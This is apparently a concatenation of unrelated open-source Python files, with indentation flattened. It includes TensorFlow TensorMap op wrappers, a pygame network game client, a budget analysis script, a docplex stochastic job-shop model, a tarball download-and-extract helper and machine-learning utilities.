# Add nodes to the TensorFlow graph.
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"TensorMapInsert", input_handle=input_handle, key=key, value=value,
name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_insert, (), dict(input_handle=input_handle, key=key,
value=value, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("key_dtype", _op._get_attr_type("key_dtype"), "value_dtype",
_op._get_attr_type("value_dtype"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"TensorMapInsert", _inputs_flat, _attrs, _result)
_result, = _result
return _result
TensorMapInsert = tf_export("raw_ops.TensorMapInsert")(_ops.to_raw_op(tensor_map_insert))
def tensor_map_insert_eager_fallback(input_handle, key, value, name, ctx):
_attr_key_dtype, (key,) = _execute.args_to_matching_eager([key], ctx, [])
_attr_value_dtype, (value,) = _execute.args_to_matching_eager([value], ctx, [])
input_handle = _ops.convert_to_tensor(input_handle, _dtypes.variant)
_inputs_flat = [input_handle, key, value]
_attrs = ("key_dtype", _attr_key_dtype, "value_dtype", _attr_value_dtype)
_result = _execute.execute(b"TensorMapInsert", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"TensorMapInsert", _inputs_flat, _attrs, _result)
_result, = _result
return _result
@_dispatch.add_dispatch_list
@tf_export('tensor_map_lookup')
def tensor_map_lookup(input_handle, key, value_dtype, name=None):
r"""Returns the value from a given key in a tensor map.
input_handle: the input map
key: the key to be looked up
value: the value found from the given key
Args:
input_handle: A `Tensor` of type `variant`.
key: A `Tensor`.
value_dtype: A `tf.DType`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `value_dtype`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "TensorMapLookup", name, input_handle, key, "value_dtype",
value_dtype)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return tensor_map_lookup_eager_fallback(
input_handle, key, value_dtype=value_dtype, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_lookup, (), dict(input_handle=input_handle, key=key,
value_dtype=value_dtype, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
value_dtype = _execute.make_type(value_dtype, "value_dtype")
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"TensorMapLookup", input_handle=input_handle, key=key,
value_dtype=value_dtype, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_lookup, (), dict(input_handle=input_handle, key=key,
value_dtype=value_dtype, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("key_dtype", _op._get_attr_type("key_dtype"), "value_dtype",
_op._get_attr_type("value_dtype"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"TensorMapLookup", _inputs_flat, _attrs, _result)
_result, = _result
return _result
TensorMapLookup = tf_export("raw_ops.TensorMapLookup")(_ops.to_raw_op(tensor_map_lookup))
def tensor_map_lookup_eager_fallback(input_handle, key, value_dtype, name, ctx):
value_dtype = _execute.make_type(value_dtype, "value_dtype")
_attr_key_dtype, (key,) = _execute.args_to_matching_eager([key], ctx, [])
input_handle = _ops.convert_to_tensor(input_handle, _dtypes.variant)
_inputs_flat = [input_handle, key]
_attrs = ("key_dtype", _attr_key_dtype, "value_dtype", value_dtype)
_result = _execute.execute(b"TensorMapLookup", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"TensorMapLookup", _inputs_flat, _attrs, _result)
_result, = _result
return _result
@_dispatch.add_dispatch_list
@tf_export('tensor_map_size')
def tensor_map_size(input_handle, name=None):
r"""Returns the number of tensors in the input tensor map.
input_handle: the input map
size: the number of tensors in the map
Args:
input_handle: A `Tensor` of type `variant`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `int32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "TensorMapSize", name, input_handle)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return tensor_map_size_eager_fallback(
input_handle, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_size, (), dict(input_handle=input_handle, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"TensorMapSize", input_handle=input_handle, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_size, (), dict(input_handle=input_handle, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ()
_inputs_flat = _op.inputs
_execute.record_gradient(
"TensorMapSize", _inputs_flat, _attrs, _result)
_result, = _result
return _result
TensorMapSize = tf_export("raw_ops.TensorMapSize")(_ops.to_raw_op(tensor_map_size))
def tensor_map_size_eager_fallback(input_handle, name, ctx):
input_handle = _ops.convert_to_tensor(input_handle, _dtypes.variant)
_inputs_flat = [input_handle]
_attrs = None
_result = _execute.execute(b"TensorMapSize", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"TensorMapSize", _inputs_flat, _attrs, _result)
_result, = _result
return _result
@_dispatch.add_dispatch_list
@tf_export('tensor_map_stack_keys')
def tensor_map_stack_keys(input_handle, key_dtype, name=None):
r"""Returns a Tensor stack of all keys in a tensor map.
input_handle: the input map
keys: the returned Tensor of all keys in the map
Args:
input_handle: A `Tensor` of type `variant`.
key_dtype: A `tf.DType`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `key_dtype`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "TensorMapStackKeys", name, input_handle, "key_dtype",
key_dtype)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return tensor_map_stack_keys_eager_fallback(
input_handle, key_dtype=key_dtype, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_stack_keys, (), dict(input_handle=input_handle,
key_dtype=key_dtype, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
key_dtype = _execute.make_type(key_dtype, "key_dtype")
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"TensorMapStackKeys", input_handle=input_handle, key_dtype=key_dtype,
name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_stack_keys, (), dict(input_handle=input_handle,
key_dtype=key_dtype, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("key_dtype", _op._get_attr_type("key_dtype"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"TensorMapStackKeys", _inputs_flat, _attrs, _result)
_result, = _result
return _result
TensorMapStackKeys = tf_export("raw_ops.TensorMapStackKeys")(_ops.to_raw_op(tensor_map_stack_keys))
def tensor_map_stack_keys_eager_fallback(input_handle, key_dtype, name, ctx):
key_dtype = _execute.make_type(key_dtype, "key_dtype")
input_handle = _ops.convert_to_tensor(input_handle, _dtypes.variant)
_inputs_flat = [input_handle]
_attrs = ("key_dtype", key_dtype)
_result = _execute.execute(b"TensorMapStackKeys", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"TensorMapStackKeys", _inputs_flat, _attrs, _result)
_result, = _result
return _result
| StarcoderdataPython |
9681391 | from json import load
import pygame
from pygame.locals import KEYDOWN, K_DOWN, K_LEFT, K_RIGHT, K_UP, QUIT
from quicknet.client import QClient
with open('settings.json') as file:
SETTINGS = load(file)
SELF = None
RUN = True
PLAYERS = {}
game_client = QClient(SETTINGS["ip_addr"], SETTINGS["port"])
@game_client.on("WELCOME")
def welcome_client(msg, id, players):
global PLAYERS, SELF
print(msg)
PLAYERS = players
SELF = id
@game_client.on("PLAYER_MOVED")
def move_player(player_name, xy):
PLAYERS[player_name] = xy
@game_client.on("NEW_PLAYER")
def new_player(player_name, xy):
print("New Player!", player_name)
PLAYERS[player_name] = xy
pygame.init()
screen = pygame.display.set_mode(SETTINGS["window_size"])
pygame.display.set_caption("My ONLINE game!")
clock = pygame.time.Clock()
game_client.start()
print("Started socket client")
while RUN:
for event in pygame.event.get():
if event.type == QUIT:
print("Exiting")
RUN = False
game_client.quit()
elif event.type == KEYDOWN:
if event.key == K_UP:
game_client.call("MOVE", "UP")
elif event.key == K_LEFT:
game_client.call("MOVE", "LEFT")
elif event.key == K_RIGHT:
game_client.call("MOVE", "RIGHT")
elif event.key == K_DOWN:
game_client.call("MOVE", "DOWN")
screen.fill((0, 0, 0)) # Clear the screen
for player, rect in PLAYERS.items():
if player == SELF:
r = pygame.Rect(rect[0], rect[1], 50, 50)
pygame.draw.rect(screen, (100, 100, 100), r)
else:
r = pygame.Rect(rect[0], rect[1], 50, 50)
pygame.draw.rect(screen, (200, 100, 200), r)
pygame.display.flip()
clock.tick(30)
game_client.quit()
| StarcoderdataPython |
9666307 | <reponame>pazamelin/openvino
from jinja2 import Template
from os import path, remove
from shutil import rmtree
def create_content(template: str, notebooks_data: dict, file_name: str):
"""Filling rst template with data
:param template: jinja template that will be filled with notebook data
:type template: str
:param notebooks_data: data structure containing information required to fill template
:type notebooks_data: dict
:param file_name: file name
:type file_name: str
:returns: Filled template
:rtype: str
"""
template = Template(template)
notebooks_data["notebook"] = "-".join(file_name.split("-")[:-2])
return template.render(notebooks_data)
def add_content_below(text: str, path: str, line=3) -> bool:
"""Add additional content (like binder button) to existing rst file
:param text: Text that will be added inside rst file
:type text: str
:param path: Path to modified file
:type path: str
:param line: Line number that content will be added. Defaults to 3.
:type line: int
:returns: Informs about success or failure in modifying file
:rtype: bool
"""
try:
with open(path, "r+", encoding="utf-8") as file:
current_file = file.readlines()
current_file[line:line] = text
file.seek(0)
file.writelines(current_file)
return True
except FileNotFoundError:
return False
def load_secret(path: str = "../.secret") -> str:
"""Loading secret file
:param path: Path to secret file. Defaults to "../.secret".
:type path: str
:returns: Secret key
:rtype: str
"""
with open(path, "r+") as file:
return file.readline().strip()
def process_notebook_name(notebook_name: str) -> str:
"""Processes notebook name
:param notebook_name: Notebook name by default keeps convention:
[3 digit]-name-with-dashes-with-output.rst,
example: 001-hello-world-with-output.rst
:type notebook_name: str
:returns: Processed notebook name,
001-hello-world-with-output.rst -> 001. hello world
:rtype: str
"""
return (
notebook_name[:3]
+ "."
+ " ".join(notebook_name[4:].split(".")[0].split("-")[:-2])
)
def find_latest_artifact(artifacts_dict: dict, name: str = "rst_files") -> int:
"""Finds id of latest artifact that can be downloaded
:param artifacts_dict: Fetched github actions
:type artifacts_dict: dict
:param name: Name of searched artifact. Defaults to "rst_files".
:type name: str
:returns: Id of latest artifact containing rst files
:rtype: int
"""
return max([r["id"] for r in artifacts_dict["artifacts"] if r["name"] == name])
def verify_notebook_name(notebook_name: str) -> bool:
"""Verification based on notebook name
:param notebook_name: Notebook name by default keeps convention:
[3 digit]-name-with-dashes-with-output.rst,
example: 001-hello-world-with-output.rst
:type notebook_name: str
:returns: Return if notebook meets requirements
:rtype: bool
"""
return notebook_name[:3].isdigit() and notebook_name[-4:] == ".rst"
def generate_artifact_link(owner: str, name: str) -> str:
"""Generate link for downloading artifacts
:param owner: Github repo owner name
:type owner: str
:param name: Github repo name
:type name: str
:returns: Link to api to download artifacts
:rtype: str
"""
return f"https://api.github.com/repos/{owner}/{name}/actions/artifacts"
def remove_existing(notebooks_path: str) -> None:
"""Removes file if already existed
:param notebooks_path: path to file to be removed
:type notebooks_path: str
"""
if path.exists(notebooks_path):
if path.isdir(notebooks_path):
rmtree(notebooks_path)
else:
remove(notebooks_path)
def split_notebooks_into_sections(notebooks: list) -> list:
series = [list() for _ in range(5)]
for notebook in notebooks:
try:
series[int(notebook.name[0])].append(notebook)
except IndexError:
pass
return series | StarcoderdataPython |
209201 | #!/usr/bin/env python
# coding: utf-8
# Pybank Financial Analysis
import os
import csv
csvpath = os.path.join('Resources','budget_data.csv')
analysis = os.path.join('analysis', 'Analysis.txt')
# Declare variables and lists
count = 0
months = []
revenue = []
prev_rev = 0
chg_lst =[]
# Opening the CSV file
with open(csvpath) as csvfile:
csvreader = csv.reader(csvfile,delimiter=',')
# Skipping the header row
# Able to print it out if needed
csvheader=next(csvreader)
# print(f"CSV Header: {csvheader}")
# Looping through each row of the CSV file
# ABle to print out all the rows if needed
for row in csvreader:
# print(row)
# Declaring month index in the imported data
# Appending it to an empty list
mth_ind= row[0]
months.append(mth_ind)
# Declaring revenue index in the imported data
# Appending it to an empty list
rev_ind= int(row[1])
revenue.append(rev_ind)
# Counting the number of rows/months
count += 1
if prev_rev != 0:
chg = rev_ind - int(prev_rev)
chg_lst.append(chg)
prev_rev = rev_ind
else:
prev_rev = rev_ind
# Summing up the revenue list created through looping
total = sum(revenue)
# Calculating the average change
avg = round(sum(chg_lst)/len(chg_lst),2)
# Finding the max number in the list
# Finding the index of the max number
# Finding the date associated with the same index
g_inc = max(chg_lst)
g_inc_index = chg_lst.index(g_inc)
date1 = months[g_inc_index + 1]
# Finding the min number in the list
# Finding the index of the min number
# Finding the date associated with the same index
g_dec = min(chg_lst)
g_dec_index = chg_lst.index(g_dec)
date2 = months[g_dec_index + 1]
# Printing the analysis to the terminal
print(f"Financial Analysis")
print(f"---------------------------")
print(f"Total Months: {count}")
print(f"Total Revenue: ${total}")
print(f"Average Change: ${avg}")
print(f"The Greatest Increase in Profits: {date1} (${g_inc})")
print(f"The Greatest Decrease in Profits: {date2} (${g_dec})")
def output():
# Opening new file where to write the results of the function
with open(analysis, 'w') as newFile:
# Writing the following lines in the text file
newFile.write("Financial Analysis\n")
newFile.write("---------------------------\n")
# Writing the number of months
newFile.write(f"Total Months: {count}\n")
# Writing the total revenue
newFile.write(f"Total Revenue: ${total}\n")
# Writing the average change
newFile.write(f"Average Change: ${avg}\n")
# Writing the greatest increase
newFile.write(f"The Greatest Increase in Profits: {date1} (${g_inc})\n")
# Writing the greatest decrease
newFile.write(f"The Greatest Decrease in Profits: {date2} (${g_dec})\n")
# Calling the output() function
output()
| StarcoderdataPython |
147639 | <filename>mlcomp/contrib/criterion/triplet.py<gh_stars>100-1000
import torch
import torch.nn.functional as F
from catalyst.contrib.nn.criterion.functional import cosine_distance, \
batch_all, _EPS
def triplet_loss(
embeddings: torch.Tensor, labels: torch.Tensor, margin: float = 0.3,
reduction='mean'
) -> torch.Tensor:
cosine_dists = cosine_distance(embeddings)
mask = batch_all(labels)
anchor_positive_dist = cosine_dists.unsqueeze(2)
anchor_negative_dist = cosine_dists.unsqueeze(1)
triplet_loss_value = \
F.relu(anchor_positive_dist - anchor_negative_dist + margin)
triplet_loss_value = torch.mul(triplet_loss_value, mask)
if reduction == 'mean':
num_positive_triplets = torch.gt(
triplet_loss_value,
_EPS).sum().float()
triplet_loss_value = (
triplet_loss_value.sum() / (num_positive_triplets + _EPS)
)
elif reduction == 'none':
triplet_loss_value = torch.sum(triplet_loss_value, dim=[1, 2])
else:
raise Exception(f'Unknown reduction scheme {reduction}')
return triplet_loss_value
| StarcoderdataPython |
3537160 | <filename>alipcs_py/commands/list_files.py
from typing import Optional, List
from alipcs_py.alipcs import AliPCSApi
from alipcs_py.alipcs.inner import PcsFile
from alipcs_py.common.path import join_path
from alipcs_py.commands.log import get_logger
from alipcs_py.commands.sifter import Sifter, sift
from alipcs_py.commands.display import display_files
from rich import print
logger = get_logger(__name__)
DEFAULT_MAX_WORKERS = 10
def list_file(
api: AliPCSApi,
remotepath: str,
file_id: str = None,
share_id: str = None,
share_token: str = None,
desc: bool = False,
name: bool = False,
time: bool = False,
size: bool = False,
all: bool = False,
limit: int = 100,
url_expire_sec: int = 7200,
recursive: bool = False,
sifters: List[Sifter] = [],
highlight: bool = False,
rapiduploadinfo_file: Optional[str] = None,
user_id: Optional[str] = None,
user_name: Optional[str] = None,
show_size: bool = False,
show_date: bool = False,
show_file_id: bool = False,
show_hash: bool = False,
show_absolute_path: bool = False,
show_dl_link: bool = False,
csv: bool = False,
only_dl_link: bool = False,
):
pcs_file: Optional[PcsFile]
if file_id:
pcs_file = api.meta(file_id, share_id=share_id, share_token=share_token)[0]
else:
pcs_file = api.path(remotepath, share_id=share_id, share_token=share_token)
if not pcs_file:
return
is_dir = pcs_file.is_dir
if is_dir:
pcs_files = api.list_path(
remotepath,
file_id=pcs_file.file_id,
share_id=share_id,
share_token=share_token,
desc=desc,
name=name,
time=time,
size=size,
all=all,
limit=limit,
url_expire_sec=url_expire_sec,
)
else:
pcs_files = [pcs_file]
pcs_files = sift(pcs_files, sifters, recursive=recursive)
if not pcs_files:
return
if show_dl_link:
for pcs_file in pcs_files:
if only_dl_link:
print(pcs_file.download_url)
if not only_dl_link:
display_files(
pcs_files,
remotepath,
sifters=sifters,
highlight=highlight,
show_size=show_size,
show_date=show_date,
show_file_id=show_file_id,
show_hash=show_hash,
show_absolute_path=show_absolute_path,
show_dl_link=show_dl_link,
csv=csv,
)
if is_dir and recursive:
for pcs_file in pcs_files:
if pcs_file.is_dir:
list_file(
api,
join_path(remotepath, pcs_file.name),
file_id=pcs_file.file_id,
share_id=share_id,
share_token=share_token,
desc=desc,
name=name,
time=time,
size=size,
all=all,
limit=limit,
url_expire_sec=url_expire_sec,
recursive=recursive,
sifters=sifters,
highlight=highlight,
rapiduploadinfo_file=rapiduploadinfo_file,
user_id=user_id,
user_name=user_name,
show_size=show_size,
show_date=show_date,
show_file_id=show_file_id,
show_hash=show_hash,
show_absolute_path=show_absolute_path,
show_dl_link=show_dl_link,
csv=csv,
only_dl_link=only_dl_link,
)
def list_files(
api: AliPCSApi,
*remotepaths: str,
file_ids: List[str] = [],
share_id: str = None,
share_token: str = None,
desc: bool = False,
name: bool = False,
time: bool = False,
size: bool = False,
all: bool = False,
limit: int = 100,
url_expire_sec: int = 7200,
recursive: bool = False,
sifters: List[Sifter] = [],
highlight: bool = False,
rapiduploadinfo_file: Optional[str] = None,
user_id: Optional[str] = None,
user_name: Optional[str] = None,
show_size: bool = False,
show_date: bool = False,
show_file_id: bool = False,
show_hash: bool = False,
show_absolute_path: bool = False,
show_dl_link: bool = False,
csv: bool = False,
only_dl_link: bool = False,
):
for rp in remotepaths:
list_file(
api,
rp,
share_id=share_id,
share_token=share_token,
desc=desc,
name=name,
time=time,
size=size,
all=all,
limit=limit,
url_expire_sec=url_expire_sec,
recursive=recursive,
sifters=sifters,
highlight=highlight,
rapiduploadinfo_file=rapiduploadinfo_file,
user_id=user_id,
user_name=user_name,
show_size=show_size,
show_date=show_date,
show_file_id=show_file_id,
show_hash=show_hash,
show_absolute_path=show_absolute_path,
show_dl_link=show_dl_link,
csv=csv,
only_dl_link=only_dl_link,
)
for file_id in file_ids:
list_file(
api,
"",
file_id=file_id,
share_id=share_id,
share_token=share_token,
desc=desc,
name=name,
time=time,
size=size,
all=all,
limit=limit,
url_expire_sec=url_expire_sec,
recursive=recursive,
sifters=sifters,
highlight=highlight,
rapiduploadinfo_file=rapiduploadinfo_file,
user_id=user_id,
user_name=user_name,
show_size=show_size,
show_date=show_date,
show_file_id=show_file_id,
show_hash=show_hash,
show_absolute_path=show_absolute_path,
show_dl_link=show_dl_link,
csv=csv,
only_dl_link=only_dl_link,
)
| StarcoderdataPython |
6451164 | # --------------------------------------------------------------------------
# Source file provided under Apache License, Version 2.0, January 2004,
# http://www.apache.org/licenses/
# (c) Copyright IBM Corp. 2015, 2016
# --------------------------------------------------------------------------
"""
Problem Description
-------------------
The Stochastic Job-Shop Scheduling problem is a variant of the classical
deterministic Job-Shop Scheduling problem (see sched_jobshop.cpp) where
the duration of operations is uncertain.
Scenarios
---------
This example illustrates how to solve a Stochastic Job-Shop Scheduling
problem using a scenario-based approach. A set of n scenarios is created,
each scenario represents a particular realization of the durations of
the operations.
The instance is a small 6x6 Job-Shop Scheduling problem with 20 scenarios.
In the example we suppose the scenarios are given as input. In practical
problems, these scenarios may be given by a selection of representative
past execution of the system or they may be computed by sampling the
probability distributions of operations duration.
For example the different scenarios give the following durations
for the 6 operations of the first job:
JOB #1
Machine: M5 -> M1 -> M4 -> M3 -> M0 -> M2
Duration in scenario #00: 218 284 321 201 101 199
Duration in scenario #01: 259 313 311 191 93 211
...
Duration in scenario #19: 501 309 301 203 95 213
The objective is to find a robust sequencing of operations on machines so
as to minimize the expected makespan across all scenarios.
The problem can be seen as a particular case of Two-Stage Stochastic
Programming problem where first stage decision variables are the sequences
of operations on machines and second stage decision variables are the
actual start/end time of operations that will depend on the actual duration
of operations at execution time.
The model proposed here generalizes to any type of stochastic scheduling
problem where first stage decision variables involve creating robust
sequences of operations on a machine.
Model
-----
Each scenario is modeled as a particular deterministic Job-Shop Scheduling
problem.
Let makespan[k] denote the makespan of scenario k and sequence[k][j] denote
the sequence variable representing the sequencing of operations on machine
j in scenario k.
A set of 'sameSequence' constraints are posted across all scenarios k to
state that for a machine j, the sequence of operations should be the same
for all scenarios. The sequence variable of the first scenario (sequence[0][j])
is used as reference:
for j, for 0<k: sameSequence(sequence[0][j],sequence[k][j])
The global objective function is the average makespan over the different
scenarios:
objective: (sum(k) makespan[k]) / nbScenarios
Solution quality
----------------
Solution with expected makespan 4648.4 is in fact optimal.
Note that the solution built by using the optimal solution of the
deterministic Job-Shop Scheduling problem using average operation duration
yields an expected makespan of 4749.6 which is clearly suboptimal.
Please refer to documentation for appropriate setup of solving configuration.
"""
from docplex.cp.model import CpoModel, INT_MAX
import docplex.cp.utils_visu as visu
import os
#-----------------------------------------------------------------------------
# Initialize the problem data
#-----------------------------------------------------------------------------
# Read next non empty line
def next_int_line(f):
line = None
while not line:
line = f.readline().split()
return [int(v) for v in line]
# Read the input data file.
# First line contains the number of jobs, the number of machines and the number of scenarios.
# The next nb_jobs lines are ordered sequence of machines for each job
# The next nb_scenarios * nb_jobs lines are the value of durations of each operation for each scenario
filename = os.path.dirname(os.path.abspath(__file__)) + "/data/stochastic_jobshop_default.data"
data = []
with open(filename, "r") as file:
NB_JOBS, NB_MACHINES, NB_SCENARIOS = next_int_line(file)
MACHINES = [next_int_line(file) for i in range(NB_JOBS)]
DURATIONS = [[next_int_line(file) for i in range(NB_JOBS)] for k in range(NB_SCENARIOS)]
#-----------------------------------------------------------------------------
# Build the model
#-----------------------------------------------------------------------------
# Create model
mdl = CpoModel()
# Build sub-model corresponding to the kth scenario
def make_scenario_submodel(k):
itvs = [[mdl.interval_var(size=DURATIONS[k][i][j],
name="O{}-{}-{}".format(k, i, j)) for j in range(NB_MACHINES)]
for i in range(NB_JOBS)]
mach = [[] for j in range(NB_MACHINES)]
for i in range(NB_JOBS):
for j in range(NB_MACHINES):
mach[MACHINES[i][j]].append(itvs[i][j])
if j > 0:
mdl.add(mdl.end_before_start(itvs[i][j - 1], itvs[i][j]))
sequences = [mdl.sequence_var(mach[j], name="S{}:M{}".format(k, j)) for j in range(NB_MACHINES)]
for s in sequences:
mdl.add(mdl.no_overlap(s))
makespan = mdl.integer_var(0, INT_MAX, name='makespan' + str(k))
mdl.add(makespan == mdl.max([mdl.end_of(itvs[i][NB_MACHINES - 1]) for i in range(NB_JOBS)]))
return sequences, makespan
# Initialize working variables
ref_sequences = []
makespans = []
# Build all possible scenarios
for k in range(NB_SCENARIOS):
sequences, makespan = make_scenario_submodel(k)
makespans.append(makespan)
if k == 0:
ref_sequences = sequences
else:
for j in range(NB_MACHINES):
mdl.add(mdl.same_sequence(ref_sequences[j], sequences[j]))
# Minimize average makespan
expected_makespan = mdl.sum(makespans) / NB_SCENARIOS
mdl.add(mdl.minimize(expected_makespan))
#-----------------------------------------------------------------------------
# Solve the model and display the result
#-----------------------------------------------------------------------------
# Solve model
print("Solving model....")
msol = mdl.solve(TimeLimit=10, FailLimit=250000)
print("Solution: ")
msol.print_solution()
if msol and visu.is_visu_enabled():
import docplex.cp.utils_visu as visu
import matplotlib.pyplot as plt
makespan_values = [msol.get_var_solution(m).get_value() for m in makespans]
plt.hist(makespan_values, color='skyblue')
plt.axvline(msol.get_objective_values()[0], color='navy', linestyle='dashed', linewidth=2)
plt.title("Makespan histogram")
plt.xlabel("Value")
plt.ylabel("Frequency")
visu.timeline("Solution sequencing for stochastic job-shop " + filename)
visu.panel("Machines")
for j in range(NB_MACHINES):
visu.sequence(name='M' + str(j))
itvs = msol.get_var_solution(ref_sequences[j]).get_value()
for v in itvs:
k, i, m = v.get_name().split('-')
visu.interval(v, int(i), 'O' + i + '-' + m)
visu.show()
| StarcoderdataPython |
4950096 | <reponame>sre-ish/website<gh_stars>0
#!/bin/python
# Download a tgz file from a pre-defined URL
# Uncompresses it and install it under a directory (e.g /shared/)
import os
import sys
import tarfile
def untar(d,f):
fpath = d + f
tar = tarfile.open(fpath)
tar.extractall(d)
tar.close()
return
# --- * ---
def downl(u):
os.system(wget_cmd + u)
return u.split('/')[-1]
# --- Main Program --- #
url = "https://www.dropbox.com/afile.tgz"
dest = "/shared/"
wget_cmd = "wget -P " + dest + " -nc -c --read-timeout=5 --tries=0 "
if __name__ == "__main__":
fl = downl(url)
if os.path.isfile(dest + fl):
if fl.split('.')[-1] == "tgz":
untar(dest,fl)
os.system("chown -R root:root " + dest + "*")
os.system("chmod -R 755 " + dest + "*")
os.system("touch " + dest + "biosoft.unpacked")
| StarcoderdataPython |
1773112 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Python version: 3.6
import argparse
def args_parser():
parser = argparse.ArgumentParser()
# federated arguments
parser.add_argument('--alg', type=str, default='fedavg', choices=['fedavg', 'fedprox'], help="client nets aggregation algorithm")
parser.add_argument('--epochs', type=int, default=10, help="rounds of training")
parser.add_argument('--num_users', type=int, default=100, help="number of users: K")
parser.add_argument('--frac', type=float, default=0.1, help="the fraction of clients: C")
parser.add_argument('--local_ep', type=int, default=5, help="the number of local epochs: E")
parser.add_argument('--local_bs', type=int, default=10, help="local batch size: B")
parser.add_argument('--bs', type=int, default=128, help="test batch size")
parser.add_argument('--lr', type=float, default=0.01, help="learning rate")
parser.add_argument('--momentum', type=float, default=0.5, help="SGD momentum (default: 0.5)")
# model arguments
parser.add_argument('--model', type=str, default='lenet', help='model name')
# other arguments
parser.add_argument('--dataset', type=str, default='mnist', help="name of dataset")
parser.add_argument('--iid', action='store_true', help='whether i.i.d or not')
parser.add_argument('--alpha', default='0.05', choices=['0.00', '0.05', '0.10', '0.20', '0.50', '1.00', '10.00', '100.00'], help='controls the iid-ness of the dataset split')
parser.add_argument('--gpu', type=int, default=0, help="GPU ID, -1 for CPU")
parser.add_argument('--seed', type=int, default=1, help='random seed (default: 1)')
parser.add_argument('--all_clients', action='store_true', help='aggregation over all clients')
args = parser.parse_args()
return args
| StarcoderdataPython |
324911 | <gh_stars>100-1000
""" test utils functions """
# pylint: disable= invalid-name
import numpy as np
import pytest
from autofaiss.utils.array_functions import multi_array_split
def test_multi_array_split():
"""test multi_array_split fct number 1"""
assert len(list(multi_array_split([np.zeros((123, 2)), np.zeros((123, 5))], 41))) == 41
@pytest.mark.parametrize("seed", list(range(1, 10)))
def test_multi_array_split_2(seed):
"""test multi_array_split fct number 2"""
np.random.seed(seed)
length = np.random.randint(1, 100)
nb_chunk = np.random.randint(1, length + 1)
dim1 = np.random.randint(10)
dim2 = np.random.randint(10)
a = np.random.randint(0, 10000, (length, dim1))
b = np.random.randint(0, 10000, (length, dim2))
c = list(multi_array_split([a, b], nb_chunk))
a2 = np.concatenate([x[0] for x in c])
b2 = np.concatenate([x[1] for x in c])
assert np.all(a == a2)
assert np.all(b == b2)
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.